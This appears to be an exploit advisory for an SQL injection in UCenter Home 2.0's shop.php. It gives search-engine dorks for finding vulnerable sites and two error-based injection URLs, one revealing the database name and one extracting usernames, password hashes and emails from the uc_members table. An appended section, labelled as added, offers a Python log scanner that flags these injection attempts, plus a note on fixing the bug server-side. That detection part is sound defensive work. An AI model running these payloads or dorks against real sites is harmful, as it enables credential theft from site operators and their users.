__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okey.

Edit the DB name: `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okey.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
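
Added example (not part of the original advisory): a log check a site operator can run to find requests to shop.php whose shopid is not a plain integer, and to tag the ones carrying the error-based markers visible in the strings above. The log lines are constructed samples; the function names and the assumption that a legitimate shopid is a short decimal number are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not real traffic) in combined-log style.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2011:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120
198.51.100.9 - - [01/Jan/2011:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812
198.51.100.9 - - [01/Jan/2011:10:00:09 +0000] "GET /shop.php?ac=view&shopid=12abc HTTP/1.1" 200 640
198.51.100.3 - - [01/Jan/2011:10:00:11 +0000] "GET /index.php?shopid=1%20or%201=1 HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Markers of the duplicate-key error technique, compared after whitespace removal.
ERROR_BASED_MARKERS = ("floor(rand(", "groupby", "information_schema")


def classify_shopid(value):
    """Return 'ok', 'non_numeric' or 'error_based_sqli' for one decoded shopid."""
    # Assumption: a legitimate shopid is a short decimal id, as in shopid=253.
    if re.fullmatch(r"[0-9]{1,10}", value):
        return "ok"
    # Drop whitespace and inline /* */ comments so spacing tricks do not hide markers.
    compact = re.sub(r"/\*.*?\*/|\s+", "", value.lower())
    if all(marker in compact for marker in ERROR_BASED_MARKERS):
        return "error_based_sqli"
    return "non_numeric"


def scan(log_text):
    """Return (client, verdict, value prefix) for each suspicious shop.php request."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/shop.php"):
            continue
        # parse_qs percent-decodes values; a repeated shopid yields several values.
        for value in parse_qs(url.query).get("shopid", []):
            verdict = classify_shopid(value)
            if verdict != "ok":
                findings.append((client, verdict, value[:40]))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Log matching only finds attempts after the fact; the durable fix is server-side, casting shopid to an integer or binding it as a query parameter before it reaches MySQL.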